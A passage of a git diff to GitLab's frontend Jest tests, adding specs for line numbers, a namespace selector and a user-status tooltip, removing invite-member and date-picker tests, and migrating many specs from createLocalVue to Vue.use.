wrapper.findComponent(GlAvatarLink); const findSidebarToggleBtn = () => wrapper.findComponent(GlButton); + const findStatusTooltip = () => wrapper.findComponent(GlTooltip); const findActionButtons = () => wrapper.findByTestId('ci-header-action-buttons'); const findHeaderItemText = () => wrapper.findByTestId('ci-header-item-text'); @@ -91,6 +92,21 @@ describe('Header CI Component', () => { }); }); + describe('when the user has a status', () => { + const STATUS_MESSAGE = 'Working on exciting features...'; + + beforeEach(() => { + createComponent({ + itemName: 'Pipeline', + user: { ...defaultProps.user, status: { message: STATUS_MESSAGE } }, + }); + }); + + it('renders a tooltip', () => { + expect(findStatusTooltip().text()).toBe(STATUS_MESSAGE); + }); + }); + describe('with data from GraphQL', () => { const userId = 1; diff --git a/spec/frontend/vue_shared/components/line_numbers_spec.js b/spec/frontend/vue_shared/components/line_numbers_spec.js new file mode 100644 index 00000000000..5bedd0ccd02 --- /dev/null +++ b/spec/frontend/vue_shared/components/line_numbers_spec.js @@ -0,0 +1,71 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlIcon, GlLink } from '@gitlab/ui'; +import LineNumbers from '~/vue_shared/components/line_numbers.vue'; + +describe('Line Numbers component', () => { + let wrapper; + const lines = 10; + + const createComponent = () => { + wrapper = shallowMount(LineNumbers, { propsData: { lines } }); + }; + + const findGlIcon = () => wrapper.findComponent(GlIcon); + const findLineNumbers = () => wrapper.findAllComponents(GlLink); + const findFirstLineNumber = () => findLineNumbers().at(0); + const findSecondLineNumber = () => findLineNumbers().at(1); + + beforeEach(() => createComponent()); + + afterEach(() => wrapper.destroy()); + + describe('rendering', () => { + it('renders Line Numbers', () => { + expect(findLineNumbers().length).toBe(lines); + expect(findFirstLineNumber().attributes()).toMatchObject({ + id: 'L1', + href: '#L1', + }); 
+ }); + + it('renders a link icon', () => { + expect(findGlIcon().props()).toMatchObject({ + size: 12, + name: 'link', + }); + }); + }); + + describe('clicking a line number', () => { + let firstLineNumber; + let firstLineNumberElement; + + beforeEach(() => { + firstLineNumber = findFirstLineNumber(); + firstLineNumberElement = firstLineNumber.element; + + jest.spyOn(firstLineNumberElement, 'scrollIntoView'); + jest.spyOn(firstLineNumberElement.classList, 'add'); + jest.spyOn(firstLineNumberElement.classList, 'remove'); + + firstLineNumber.vm.$emit('click'); + }); + + it('adds the highlight (hll) class', () => { + expect(firstLineNumberElement.classList.add).toHaveBeenCalledWith('hll'); + }); + + it('removes the highlight (hll) class from a previously highlighted line', () => { + findSecondLineNumber().vm.$emit('click'); + + expect(firstLineNumberElement.classList.remove).toHaveBeenCalledWith('hll'); + }); + + it('scrolls the line into view', () => { + expect(firstLineNumberElement.scrollIntoView).toHaveBeenCalledWith({ + behavior: 'smooth', + block: 'center', + }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/markdown/toolbar_spec.js b/spec/frontend/vue_shared/components/markdown/toolbar_spec.js index eddc4033a65..8bff85b0bda 100644 --- a/spec/frontend/vue_shared/components/markdown/toolbar_spec.js +++ b/spec/frontend/vue_shared/components/markdown/toolbar_spec.js @@ -1,24 +1,17 @@ import { mount } from '@vue/test-utils'; -import { isExperimentVariant } from '~/experimentation/utils'; -import InviteMembersTrigger from '~/invite_members/components/invite_members_trigger.vue'; -import { INVITE_MEMBERS_IN_COMMENT } from '~/invite_members/constants'; import Toolbar from '~/vue_shared/components/markdown/toolbar.vue'; -jest.mock('~/experimentation/utils', () => ({ isExperimentVariant: jest.fn() })); - describe('toolbar', () => { let wrapper; const createMountedWrapper = (props = {}) => { wrapper = mount(Toolbar, { propsData: { markdownDocsPath: '', 
...props }, - stubs: { 'invite-members-trigger': true }, }); }; afterEach(() => { wrapper.destroy(); - isExperimentVariant.mockReset(); }); describe('user can attach file', () => { @@ -40,36 +33,4 @@ describe('toolbar', () => { expect(wrapper.vm.$el.querySelector('.uploading-container')).toBeNull(); }); }); - - describe('user can invite member', () => { - const findInviteLink = () => wrapper.find(InviteMembersTrigger); - - beforeEach(() => { - isExperimentVariant.mockReturnValue(true); - createMountedWrapper(); - }); - - it('should render the invite members trigger', () => { - expect(findInviteLink().exists()).toBe(true); - }); - - it('should have correct props', () => { - expect(findInviteLink().props().displayText).toBe('Invite Member'); - expect(findInviteLink().props().trackExperiment).toBe(INVITE_MEMBERS_IN_COMMENT); - expect(findInviteLink().props().triggerSource).toBe(INVITE_MEMBERS_IN_COMMENT); - }); - }); - - describe('user can not invite member', () => { - const findInviteLink = () => wrapper.find(InviteMembersTrigger); - - beforeEach(() => { - isExperimentVariant.mockReturnValue(false); - createMountedWrapper(); - }); - - it('should render the invite members trigger', () => { - expect(findInviteLink().exists()).toBe(false); - }); - }); }); diff --git a/spec/frontend/vue_shared/components/namespace_select/mock_data.js b/spec/frontend/vue_shared/components/namespace_select/mock_data.js new file mode 100644 index 00000000000..c9d96672e85 --- /dev/null +++ b/spec/frontend/vue_shared/components/namespace_select/mock_data.js @@ -0,0 +1,11 @@ +export const group = [ + { id: 1, name: 'Group 1', humanName: 'Group 1' }, + { id: 2, name: 'Subgroup 1', humanName: 'Group 1 / Subgroup 1' }, +]; + +export const user = [{ id: 3, name: 'User namespace 1', humanName: 'User namespace 1' }]; + +export const namespaces = { + group, + user, +}; diff --git a/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js 
b/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js new file mode 100644 index 00000000000..8f07f63993d --- /dev/null +++ b/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js @@ -0,0 +1,86 @@ +import { GlDropdown, GlDropdownItem, GlDropdownSectionHeader } from '@gitlab/ui'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import NamespaceSelect, { + i18n, +} from '~/vue_shared/components/namespace_select/namespace_select.vue'; +import { user, group, namespaces } from './mock_data'; + +describe('Namespace Select', () => { + let wrapper; + + const createComponent = (props = {}) => + shallowMountExtended(NamespaceSelect, { + propsData: { + data: namespaces, + ...props, + }, + }); + + const wrappersText = (arr) => arr.wrappers.map((w) => w.text()); + const flatNamespaces = () => [...group, ...user]; + const findDropdown = () => wrapper.findComponent(GlDropdown); + const findDropdownAttributes = (attr) => findDropdown().attributes(attr); + const selectedDropdownItemText = () => findDropdownAttributes('text'); + const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findSectionHeaders = () => wrapper.findAllComponents(GlDropdownSectionHeader); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders the dropdown', () => { + expect(findDropdown().exists()).toBe(true); + }); + + it('renders each dropdown item', () => { + const items = findDropdownItems().wrappers; + expect(items).toHaveLength(flatNamespaces().length); + }); + + it('renders the human name for each item', () => { + const dropdownItems = wrappersText(findDropdownItems()); + const flatNames = flatNamespaces().map(({ humanName }) => humanName); + expect(dropdownItems).toEqual(flatNames); + }); + + it('sets the initial dropdown text', () => { + expect(selectedDropdownItemText()).toBe(i18n.DEFAULT_TEXT); + }); + + it('splits group and user 
namespaces', () => { + const headers = findSectionHeaders(); + expect(headers).toHaveLength(2); + expect(wrappersText(headers)).toEqual([i18n.GROUPS, i18n.USERS]); + }); + + it('sets the dropdown to full width', () => { + expect(findDropdownAttributes('block')).toBeUndefined(); + + wrapper = createComponent({ fullWidth: true }); + + expect(findDropdownAttributes('block')).not.toBeUndefined(); + expect(findDropdownAttributes('block')).toBe('true'); + }); + + describe('with a selected namespace', () => { + const selectedGroupIndex = 1; + const selectedItem = group[selectedGroupIndex]; + + beforeEach(() => { + findDropdownItems().at(selectedGroupIndex).vm.$emit('click'); + }); + + it('sets the dropdown text', () => { + expect(selectedDropdownItemText()).toBe(selectedItem.humanName); + }); + + it('emits the `select` event when a namespace is selected', () => { + const args = [selectedItem]; + expect(wrapper.emitted('select')).toEqual([args]); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js b/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js index 0f30b50da0b..c8dab0204d3 100644 --- a/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js +++ b/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js @@ -1,10 +1,11 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import IssuePlaceholderNote from '~/vue_shared/components/notes/placeholder_note.vue'; +import UserAvatarLink from '~/vue_shared/components/user_avatar/user_avatar_link.vue'; import { userDataMock } from '../../../notes/mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const getters = { getUserData: () => userDataMock, @@ -15,9 +16,8 @@ describe('Issue placeholder note component', () => { const findNote = () => wrapper.find({ ref: 'note' }); - const createComponent = 
(isIndividual = false) => { + const createComponent = (isIndividual = false, propsData = {}) => { wrapper = shallowMount(IssuePlaceholderNote, { - localVue, store: new Vuex.Store({ getters, }), @@ -26,6 +26,7 @@ describe('Issue placeholder note component', () => { body: 'Foo', individual_note: isIndividual, }, + ...propsData, }, }); }; @@ -52,4 +53,17 @@ describe('Issue placeholder note component', () => { expect(findNote().classes()).toContain('discussion'); }); + + describe('avatar size', () => { + it.each` + size | line | isOverviewTab + ${40} | ${null} | ${false} + ${24} | ${{ line_code: '123' }} | ${false} + ${40} | ${{ line_code: '123' }} | ${true} + `('renders avatar $size for $line and $isOverviewTab', ({ size, line, isOverviewTab }) => { + createComponent(false, { line, isOverviewTab }); + + expect(wrapper.findComponent(UserAvatarLink).props('imgSize')).toBe(size); + }); + }); }); diff --git a/spec/frontend/import_entities/components/pagination_bar_spec.js b/spec/frontend/vue_shared/components/pagination_bar/pagination_bar_spec.js index 163ce11a8db..08119dee8af 100644 --- a/spec/frontend/import_entities/components/pagination_bar_spec.js +++ b/spec/frontend/vue_shared/components/pagination_bar/pagination_bar_spec.js @@ -1,16 +1,16 @@ import { GlPagination, GlDropdown, GlDropdownItem } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; -import PaginationBar from '~/import_entities/components/pagination_bar.vue'; +import PaginationBar from '~/vue_shared/components/pagination_bar/pagination_bar.vue'; import PaginationLinks from '~/vue_shared/components/pagination_links.vue'; describe('Pagination bar', () => { const DEFAULT_PROPS = { pageInfo: { total: 50, - page: 1, + totalPages: 3, + page: 3, perPage: 20, }, - itemsCount: 17, }; let wrapper; @@ -73,7 +73,7 @@ describe('Pagination bar', () => { createComponent(); expect(wrapper.find('[data-testid="information"]').text()).toMatchInterpolatedText( - 'Showing 1 - 17 of 50', + 'Showing 41 - 50 of 50', ); 
}); @@ -82,11 +82,12 @@ describe('Pagination bar', () => { pageInfo: { ...DEFAULT_PROPS.pageInfo, total: 1200, + page: 2, }, }); expect(wrapper.find('[data-testid="information"]').text()).toMatchInterpolatedText( - 'Showing 1 - 17 of 1000+', + 'Showing 21 - 40 of 1000+', ); }); }); diff --git a/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js b/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js index 7fdacbe83a2..5afa017aa76 100644 --- a/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js +++ b/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js @@ -1,13 +1,12 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import mockProjects from 'test_fixtures_static/projects.json'; import { trimText } from 'helpers/text_helper'; import ProjectAvatar from '~/vue_shared/components/deprecated_project_avatar/default.vue'; import ProjectListItem from '~/vue_shared/components/project_selector/project_list_item.vue'; -const localVue = createLocalVue(); - describe('ProjectListItem component', () => { - const Component = localVue.extend(ProjectListItem); + const Component = Vue.extend(ProjectListItem); let wrapper; let vm; let options; @@ -20,7 +19,6 @@ describe('ProjectListItem component', () => { project, selected: false, }, - localVue, }; }); diff --git a/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js b/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js index de5cee846a1..34cee10392d 100644 --- a/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js +++ b/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js @@ -1,5 +1,5 @@ import { GlSearchBoxByType, GlInfiniteScroll } from '@gitlab/ui'; -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from 
'@vue/test-utils'; import { head } from 'lodash'; import Vue from 'vue'; import mockProjects from 'test_fixtures_static/projects.json'; @@ -7,8 +7,6 @@ import { trimText } from 'helpers/text_helper'; import ProjectListItem from '~/vue_shared/components/project_selector/project_list_item.vue'; import ProjectSelector from '~/vue_shared/components/project_selector/project_selector.vue'; -const localVue = createLocalVue(); - describe('ProjectSelector component', () => { let wrapper; let vm; @@ -28,7 +26,6 @@ describe('ProjectSelector component', () => { beforeEach(() => { wrapper = mount(Vue.extend(ProjectSelector), { - localVue, propsData: { projectSearchResults: searchResults, selectedProjects: selected, diff --git a/spec/frontend/vue_shared/components/registry/metadata_item_spec.js b/spec/frontend/vue_shared/components/registry/metadata_item_spec.js index 1ccf3ddc5a5..e4abdc15fd5 100644 --- a/spec/frontend/vue_shared/components/registry/metadata_item_spec.js +++ b/spec/frontend/vue_shared/components/registry/metadata_item_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlLink } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import component from '~/vue_shared/components/registry/metadata_item.vue'; -import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate.vue'; +import TooltipOnTruncate from '~/vue_shared/components/tooltip_on_truncate/tooltip_on_truncate.vue'; describe('Metadata Item', () => { let wrapper; diff --git a/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js b/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js index 8536ffed573..e74a867ec97 100644 --- a/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js +++ b/spec/frontend/vue_shared/components/runner_instructions/runner_instructions_modal_spec.js @@ -1,7 +1,7 @@ import { GlAlert, 
GlModal, GlButton, GlLoadingIcon, GlSkeletonLoader } from '@gitlab/ui'; import { GlBreakpointInstance as bp } from '@gitlab/ui/dist/utils'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; @@ -16,8 +16,7 @@ import { mockGraphqlInstructionsWindows, } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); let resizeCallback; const MockResizeObserver = { @@ -33,7 +32,7 @@ const MockResizeObserver = { }, }; -localVue.directive('gl-resize-observer', MockResizeObserver); +Vue.directive('gl-resize-observer', MockResizeObserver); jest.mock('@gitlab/ui/dist/utils'); @@ -67,7 +66,6 @@ describe('RunnerInstructionsModal component', () => { registrationToken: 'MY_TOKEN', ...props, }, - localVue, apolloProvider: fakeApollo, ...options, }), diff --git a/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js b/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js deleted file mode 100644 index e72b3bf45c4..00000000000 --- a/spec/frontend/vue_shared/components/sidebar/collapsed_grouped_date_picker_spec.js +++ /dev/null @@ -1,103 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; - -import CollapsedGroupedDatePicker from '~/vue_shared/components/sidebar/collapsed_grouped_date_picker.vue'; -import CollapsedCalendarIcon from '~/vue_shared/components/sidebar/collapsed_calendar_icon.vue'; - -describe('CollapsedGroupedDatePicker', () => { - let wrapper; - - const defaultProps = { - showToggleSidebar: true, - }; - - const minDate = new Date('07/17/2016'); - const maxDate = new Date('07/17/2017'); - - const createComponent = ({ props = {} } = {}) => { - wrapper = 
shallowMount(CollapsedGroupedDatePicker, { - propsData: { ...defaultProps, ...props }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - }); - - const findCollapsedCalendarIcon = () => wrapper.findComponent(CollapsedCalendarIcon); - const findAllCollapsedCalendarIcons = () => wrapper.findAllComponents(CollapsedCalendarIcon); - - describe('toggleCollapse events', () => { - it('should emit when collapsed-calendar-icon is clicked', () => { - createComponent(); - - findCollapsedCalendarIcon().trigger('click'); - - expect(wrapper.emitted('toggleCollapse')[0]).toBeDefined(); - }); - }); - - describe('minDate and maxDate', () => { - it('should render both collapsed-calendar-icon', () => { - createComponent({ - props: { - minDate, - maxDate, - }, - }); - - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(2); - expect(icons.at(0).text()).toBe('Jul 17 2016'); - expect(icons.at(1).text()).toBe('Jul 17 2017'); - }); - }); - - describe('minDate', () => { - it('should render minDate in collapsed-calendar-icon', () => { - createComponent({ - props: { - minDate, - }, - }); - - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('From Jul 17 2016'); - }); - }); - - describe('maxDate', () => { - it('should render maxDate in collapsed-calendar-icon', () => { - createComponent({ - props: { - maxDate, - }, - }); - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('Until Jul 17 2017'); - }); - }); - - describe('no dates', () => { - beforeEach(() => { - createComponent(); - }); - - it('should render None', () => { - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.length).toBe(1); - expect(icons.at(0).text()).toBe('None'); - }); - - it('should have tooltip as `Start and due date`', () => { - const icons = findAllCollapsedCalendarIcons(); - - expect(icons.at(0).props('tooltipText')).toBe('Start and due date'); - 
}); - }); -}); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js index 59b170bfba9..c4ed975e746 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_button_spec.js @@ -1,5 +1,6 @@ import { GlIcon, GlButton } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownButton from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_button.vue'; @@ -9,8 +10,7 @@ import labelSelectModule from '~/vue_shared/components/sidebar/labels_select_vue import { mockConfig } from './mock_data'; let store; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { store = new Vuex.Store(labelSelectModule()); @@ -18,7 +18,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownButton, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js index c4a645082e6..1fe85637a62 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view_spec.js @@ -1,5 +1,6 @@ import { GlButton, GlFormInput, GlLink, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import 
DropdownContentsCreateView from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_create_view.vue'; @@ -8,8 +9,7 @@ import labelSelectModule from '~/vue_shared/components/sidebar/labels_select_vue import { mockConfig, mockSuggestedColors } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { const store = new Vuex.Store(labelSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownContentsCreateView, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js index e39e8794fdd..80b8edd28ba 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view_spec.js @@ -5,7 +5,8 @@ import { GlSearchBoxByType, GlLink, } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { UP_KEY_CODE, DOWN_KEY_CODE, ENTER_KEY_CODE, ESC_KEY_CODE } from '~/lib/utils/keycodes'; import DropdownContentsLabelsView from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_labels_view.vue'; @@ -18,8 +19,7 @@ import defaultState from '~/vue_shared/components/sidebar/labels_select_vue/stor import { mockConfig, mockLabels, mockRegularLabel } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('DropdownContentsLabelsView', () => { let wrapper; @@ -43,7 +43,6 @@ describe('DropdownContentsLabelsView', () => { store.dispatch('receiveLabelsSuccess', 
mockLabels); wrapper = shallowMount(DropdownContentsLabelsView, { - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js index 88557917cb5..9781d9c4de0 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_contents_spec.js @@ -1,4 +1,5 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_vue/constants'; @@ -7,8 +8,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig, propsData = {}) => { const store = new Vuex.Store(labelsSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig, propsData = {}) => { return shallowMount(DropdownContents, { propsData, - localVue, store, }); }; diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js index 726a113dbd9..110c1d1b7eb 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_title_spec.js @@ -1,5 +1,6 @@ import { GlButton, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownTitle from 
'~/vue_shared/components/sidebar/labels_select_vue/dropdown_title.vue'; @@ -8,8 +9,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const createComponent = (initialState = mockConfig) => { const store = new Vuex.Store(labelsSelectModule()); @@ -17,7 +17,6 @@ const createComponent = (initialState = mockConfig) => { store.dispatch('setInitialState', initialState); return shallowMount(DropdownTitle, { - localVue, store, propsData: { labelsSelectInProgress: false, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js index 960ea77cb6e..f3c4839002b 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/dropdown_value_spec.js @@ -1,5 +1,6 @@ import { GlLabel } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import DropdownValue from '~/vue_shared/components/sidebar/labels_select_vue/dropdown_value.vue'; @@ -8,8 +9,7 @@ import labelsSelectModule from '~/vue_shared/components/sidebar/labels_select_vu import { mockConfig, mockLabels, mockRegularLabel, mockScopedLabel } from './mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('DropdownValue', () => { let wrapper; @@ -23,7 +23,6 @@ describe('DropdownValue', () => { store.dispatch('setInitialState', { ...mockConfig, ...initialState }); wrapper = shallowMount(DropdownValue, { - localVue, store, slots, }); diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js 
b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js index bc1ec8b812b..4b0ba075eda 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/labels_select_root_spec.js @@ -1,4 +1,5 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { isInViewport } from '~/lib/utils/common_utils'; @@ -18,8 +19,7 @@ jest.mock('~/lib/utils/common_utils', () => ({ isInViewport: jest.fn().mockReturnValue(true), })); -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('LabelsSelectRoot', () => { let wrapper; @@ -27,7 +27,6 @@ describe('LabelsSelectRoot', () => { const createComponent = (config = mockConfig, slots = {}) => { wrapper = shallowMount(LabelsSelectRoot, { - localVue, slots, store, propsData: config, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js index 1faa3b0af1d..884bc4684ba 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_vue/mock_data.js @@ -75,7 +75,7 @@ export const mockSuggestedColors = { '#013220': 'Dark green', '#6699cc': 'Blue-gray', '#0000ff': 'Blue', - '#e6e6fa': 'Lavendar', + '#e6e6fa': 'Lavender', '#9400d3': 'Dark violet', '#330066': 'Deep violet', '#808080': 'Gray', diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js index bf873f9162b..d8491334b5d 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js +++ 
b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_create_view_spec.js @@ -1,6 +1,6 @@ import { GlLoadingIcon, GlLink } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -18,8 +18,7 @@ jest.mock('~/flash'); const colors = Object.keys(mockSuggestedColors); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const userRecoverableError = { ...createLabelSuccessfulResponse, @@ -63,7 +62,6 @@ describe('DropdownContentsCreateView', () => { }); wrapper = shallowMount(DropdownContentsCreateView, { - localVue, apolloProvider: mockApollo, propsData: { fullPath: '', diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js index 2980409fdce..6f5a4b7e613 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_labels_view_spec.js @@ -4,8 +4,8 @@ import { GlDropdownItem, GlIntersectionObserver, } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -19,8 +19,7 @@ import { mockConfig, workspaceLabelsQueryResponse } from './mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); 
-localVue.use(VueApollo); +Vue.use(VueApollo); const localSelectedLabels = [ { @@ -47,7 +46,6 @@ describe('DropdownContentsLabelsView', () => { const mockApollo = createMockApollo([[projectLabelsQuery, queryHandler]]); wrapper = shallowMount(DropdownContentsLabelsView, { - localVue, apolloProvider: mockApollo, provide: { variant: DropdownVariant.Sidebar, diff --git a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js index 8bcef347c96..00da9b74957 100644 --- a/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js +++ b/spec/frontend/vue_shared/components/sidebar/labels_select_widget/dropdown_contents_spec.js @@ -4,12 +4,12 @@ import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_w import DropdownContents from '~/vue_shared/components/sidebar/labels_select_widget/dropdown_contents.vue'; import DropdownContentsCreateView from 